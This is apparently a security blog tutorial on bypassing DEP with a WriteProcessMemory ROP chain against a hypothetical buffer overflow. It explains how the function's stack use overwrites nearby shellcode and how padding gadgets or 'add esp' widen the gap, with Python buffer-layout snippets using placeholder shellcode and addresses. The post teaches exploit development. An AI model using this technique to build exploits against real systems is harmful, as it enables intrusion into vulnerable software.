Bypassing DEP - Increasing the Gap

This blog covers how to use the WriteProcessMemory API call to execute shellcode when there is very little gap between the shellcode and the WriteProcessMemory call skeleton.

In this blog, I document yet another lesser-known way to bypass DEP using the WriteProcessMemory API call, for a scenario where your shellcode is large but you have very little space to insert it. We will look at how you can use part of the ROP chain's space for your shellcode so that it is not corrupted during the WriteProcessMemory operation.

The following is the function definition of the WriteProcessMemory API call :-

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

WriteProcessMemory takes 5 arguments. The first is hProcess, a handle to the process into which the data will be written; for the current process this is the pseudo-handle -1 (0xffffffff). Next is lpBaseAddress, the destination address for the copy. Then comes lpBuffer, the source address, i.e. the address the bytes are copied from. nSize is the number of bytes to copy. Finally, lpNumberOfBytesWritten is the address where WriteProcessMemory stores the number of bytes it actually copied. This address must be writable.

Vulnerable Application

Moving on, let's assume a scenario where an application is vulnerable to a buffer overflow. The EIP overwrite happens at the 451st byte of the input buffer, and a total of 750 bytes must be sent to trigger the overflow. In that case the input would look like this :-

Input buffer = "A"*450 + "B"*4 + "C"*(750-450-4)

Once we send the above input to the vulnerable application, it overwrites EIP with 0x42424242 and crashes the program. We also verify that the application is compiled with DEP enabled, so executing shellcode will require a ROP chain.

Let's assume that our shellcode is 410 bytes long. In that case, we send the shellcode in place of the leading As, and the input would look like this :-

Input buffer = shellcode + "A"*(450-410) + "B"*4 + "C"*296
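
The offsets above can be sanity-checked with a short script. This is only a minimal sketch: the shellcode is a placeholder made of 0xCC bytes, and the constant names are illustrative, not taken from a real exploit.

```python
import struct

EIP_OFFSET = 450       # bytes that precede the saved return address
TOTAL_SIZE = 750       # bytes needed to trigger the overflow
SHELLCODE_SIZE = 410

# Placeholder shellcode (int3 bytes); a real payload would go here.
shellcode = b"\xcc" * SHELLCODE_SIZE

padding = b"A" * (EIP_OFFSET - len(shellcode))           # 40 bytes
eip = struct.pack("<L", 0x42424242)                      # "BBBB"
trailer = b"C" * (TOTAL_SIZE - EIP_OFFSET - len(eip))    # 296 bytes

input_buffer = shellcode + padding + eip + trailer
```

With these numbers the return address sits at offset 450 and 296 bytes remain after it for everything else.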

Now, let's create the skeleton for WriteProcessMemory API Call.

import struct

# Every value below is a placeholder that the ROP chain patches at runtime.
wp = struct.pack("<L",0x45454545)    # Address of WriteProcessMemory (read from its IAT entry)
wp += struct.pack("<L",0x46464646)   # Return address after executing WriteProcessMemory
wp += struct.pack("<L",0xffffffff)   # Value of hProcess (-1 = current process)
wp += struct.pack("<L",0x47474747)   # Value of lpBaseAddress
wp += struct.pack("<L",0x48484848)   # Value of lpBuffer
wp += struct.pack("<L",0x49494949)   # Value of nSize
wp += struct.pack("<L",0x50505050)   # Value of lpNumberOfBytesWritten

Now, the input would look something like below (Size of wp is 28) :-

Input buffer = shellcode + "A"*12 + wp + EIP + <ROP Chain>
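
To see how tight this layout is, the offset of each part can be computed directly. The sketch below uses placeholder bytes for the shellcode and the ROP chain; only the sizes matter here.

```python
import struct

# The wp skeleton with the same placeholder values as above.
wp = b"".join(struct.pack("<L", v) for v in (
    0x45454545, 0x46464646, 0xFFFFFFFF,
    0x47474747, 0x48484848, 0x49494949, 0x50505050,
))

shellcode = b"\xcc" * 410            # placeholder shellcode
padding = b"A" * 12
eip = struct.pack("<L", 0x42424242)  # overwritten return address
rop_chain = b"C" * 296               # stand-in for the real ROP chain

parts = [("shellcode", shellcode), ("padding", padding),
         ("wp", wp), ("eip", eip), ("rop_chain", rop_chain)]

# Record the starting offset of every part inside the input buffer.
offsets = {}
cursor = 0
for name, blob in parts:
    offsets[name] = cursor
    cursor += len(blob)

# Bytes separating the end of the shellcode from the start of wp.
gap = offsets["wp"] - (offsets["shellcode"] + len(shellcode))
```

Here wp starts at offset 422 and the gap between the shellcode and wp is only the 12 bytes of padding.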

A question for readers: does the above input structure look safe with respect to shellcode corruption, given that our ROP chain patches wp at runtime and then transfers execution to the start of wp?

If you answered NO, then great work. You identified a potential Rabbit hole and saved yourself some time.

Well, if you answered YES, then you just dropped into a rabbit hole like me :) . Let's talk about why.

Journey down the Rabbit Hole

To understand the issue, let's dive deep into the assembly of the WriteProcessMemory function.

0:002> u kernelbase!WriteProcessMemory L50
755f3990 8bff            mov     edi,edi
755f3992 55              push    ebp
755f3993 8bec            mov     ebp,esp
755f3995 83ec30          sub     esp,30h
755f3998 53              push    ebx
755f3999 57              push    edi
755f399a 33db            xor     ebx,ebx
755f399c 8d45d0          lea     eax,[ebp-30h]
755f399f 53              push    ebx
755f39a0 6a1c            push    1Ch
755f39a2 50              push    eax
755f39a3 6a08            push    8
755f39a5 ff750c          push    dword ptr [ebp+0Ch]
755f39a8 895df8          mov     dword ptr [ebp-8],ebx
755f39ab ff7508          push    dword ptr [ebp+8]
755f39ae 895df4          mov     dword ptr [ebp-0Ch],ebx
755f39b1 895dfc          mov     dword ptr [ebp-4],ebx
755f39b4 ff1548046975    call    dword ptr [KERNELBASE!imp_NtQueryVirtualMemory (75690448)]
755f39ba 8bc8            mov     ecx,eax
755f39bc 85c9            test    ecx,ecx

Let's skim through the WriteProcessMemory function in kernelbase. As shown above, there is a sub esp,30h instruction, which reserves 0x30 bytes of stack for WriteProcessMemory's local variables. The function's prologue is followed by multiple push instructions, each of which moves ESP a further 4 bytes down and writes to the stack.
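
A rough lower bound on how far ESP travels can be tallied from the listing above. The sketch below simply adds up the stack consumed by each instruction up to and including the call to NtQueryVirtualMemory. It is a lower bound only, since NtQueryVirtualMemory and the rest of WriteProcessMemory use more stack that is not shown in the listing.

```python
# (instruction, bytes by which it moves ESP down), in listing order
STACK_OPS = [
    ("push ebp", 4),
    ("sub esp,30h", 0x30),
    ("push ebx", 4),
    ("push edi", 4),
    ("push ebx", 4),
    ("push 1Ch", 4),
    ("push eax", 4),
    ("push 8", 4),
    ("push dword ptr [ebp+0Ch]", 4),
    ("push dword ptr [ebp+8]", 4),
    ("call NtQueryVirtualMemory", 4),   # pushes the return address
]

total_used = sum(size for _, size in STACK_OPS)

# EBP is set right after "push ebp", so everything else lands below EBP.
stack_below_ebp = total_used - 4
```

So at least 0x54 (84) bytes below EBP are touched before the first nested call even starts.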

Recall that our input buffer was of format

input buffer = shellcode + "A" * 12 + wp + EIP + ROP

The moment our ROP gadgets finish and execution reaches the start of wp, control jumps directly into the WriteProcessMemory function. To make this easier to follow, let's assume that wp starts at address 0x5000000. In the address space, the input looks something like this :-

0x4fffe5a    <start of shellcode>
    .          .
0x4ffffd0    <DWORD inside shellcode>
    .          .
0x4fffff3    <last byte of shellcode>
0x4fffff4    0x41
0x4fffff5    0x41
    .          .
    .          .
0x4ffffff    0x41
0x5000000    <start of wp>    -> ESP Pointing here

Just before WriteProcessMemory is called, ESP points to the start of wp (read up on the basics of ROP chains to see why). The ret that transfers control pops the function address, so on entry ESP is 0x5000004; push ebp then brings it back down to 0x5000000, and mov ebp,esp sets EBP to the same value. So when EIP reaches 0x755f3995, ESP is 0x5000000. Executing sub esp,30h at that address makes ESP = 0x4ffffd0. As you might have guessed, this is where the problem starts.

Since there is not enough space between the end of the shellcode and the start of wp, ESP ends up pointing inside our shellcode. The subsequent push instructions then overwrite our shellcode, and the exploit fails.

Now that we understand the rabbit hole, let's find a way out.
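
The ESP walk can be reproduced with a few lines of arithmetic. This sketch uses the example addresses from the layout above and stops at the call to NtQueryVirtualMemory, so the real damage would be larger than what it reports.

```python
WP_START = 0x5000000         # address of wp's first dword (example layout)
SHELLCODE_LAST = 0x4FFFFF3   # address of the last shellcode byte

# ESP deltas: positive values pop, negative values push or allocate.
TRACE = [
    ("ret into WriteProcessMemory", +4),
    ("push ebp", -4),
    ("sub esp,30h", -0x30),
    ("eight pushes before the call", -8 * 4),
    ("call NtQueryVirtualMemory", -4),
]

esp = WP_START
lowest = esp
for _, delta in TRACE:
    esp += delta
    lowest = min(lowest, esp)

# Shellcode bytes that fall inside the stack region used so far.
exposed = max(0, SHELLCODE_LAST - lowest + 1)
print(f"lowest ESP = {lowest:#x}, shellcode bytes at risk = {exposed}")
```

With a 12-byte gap, the last 72 bytes of the shellcode already sit inside WriteProcessMemory's working stack.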

Getting out of Rabbit Hole

The basic idea is to increase the space between the end of the shellcode and the start of wp so that ESP doesn't end up inside our shellcode. We can do something interesting here.

Suggested input structure :-

Input buffer = shellcode + "A"*40 + EIP + <dummy instructions to increase gap between shellcode and wp> + wp + rop

The proposed structure uses dummy instructions to increase the gap between the shellcode and wp. We can use gadgets like xor eax,eax or any other non-destructive instructions to widen this gap. But this comes with a trade-off: it eats into the space available for our ROP chain. Every dummy gadget costs 4 bytes, so the more dummy instructions we add, the less space is left for the ROP chain.
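
The trade-off can be put into numbers. The sketch below assumes the layout from this example (EIP at offset 450, so 40 bytes of padding follow the 410-byte shellcode, and 296 bytes are available after EIP). The function name layout_budget and the required_gap values are illustrative. The 0x54 figure is only the lower bound read off the disassembly listing, so a real exploit would need a larger margin.

```python
POST_EIP_SPACE = 296   # bytes available after the EIP overwrite (750 - 450 - 4)
WP_SIZE = 28           # size of the wp skeleton
BASE_GAP = 40 + 4      # padding + EIP dword already separate shellcode and wp
GADGET_SIZE = 4        # one 32-bit gadget address

def layout_budget(required_gap):
    """Return (dummy_gadgets, rop_bytes_left) for a desired shellcode-to-wp gap."""
    missing = max(0, required_gap - BASE_GAP)
    dummy_gadgets = -(-missing // GADGET_SIZE)   # ceiling division
    rop_bytes_left = POST_EIP_SPACE - dummy_gadgets * GADGET_SIZE - WP_SIZE
    return dummy_gadgets, rop_bytes_left

for gap in (0x54, 0x100, 0x140):
    print(hex(gap), layout_budget(gap))
```

A negative second value means the requested gap no longer fits in the buffer at all.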

One smart way to work around this is to use a gadget like add esp,0x20, which, instead of executing dummy instructions one at a time, moves ESP forward in a single step and so increases the gap between the shellcode and ESP. This requires fewer dummy instructions and can help us land right in the ROP chain. With proper stack alignment, it can be used to make execution resume at the start of our ROP chain rather than somewhere in the middle of it.
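
Where execution resumes after such a gadget is simple offset arithmetic. In the sketch below both gadget addresses are hypothetical placeholders, and the vulnerable function is assumed to return with a plain ret, so ESP points just past the overwritten return address when the gadget starts.

```python
import struct

EIP_OFFSET = 450
SKIP = 0x20                     # amount added by "add esp,0x20"

ADD_ESP_GADGET = 0x51515151     # hypothetical address of "add esp,0x20 ; ret"
FIRST_ROP_GADGET = 0x52525252   # hypothetical first gadget of the real chain

payload = b"\xcc" * 410 + b"A" * 40           # placeholder shellcode + padding
payload += struct.pack("<L", ADD_ESP_GADGET)  # overwrites the return address
payload += b"D" * SKIP                        # bytes that ESP jumps over
payload += struct.pack("<L", FIRST_ROP_GADGET)

# After the vulnerable function's ret, ESP sits just past the return address.
esp_offset = EIP_OFFSET + 4
# The gadget adds SKIP to ESP; its ret then pops the dword found there.
esp_offset += SKIP
next_gadget = struct.unpack_from("<L", payload, esp_offset)[0]
```

The skipped bytes still take up room in the buffer, but they never have to be valid gadget addresses.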


I discovered this trick during my own learning process. I have not come across many blogs explaining how to work around these size restrictions, so I thought it would be a good idea to share it with the community. Contact me on Twitter with any feedback.

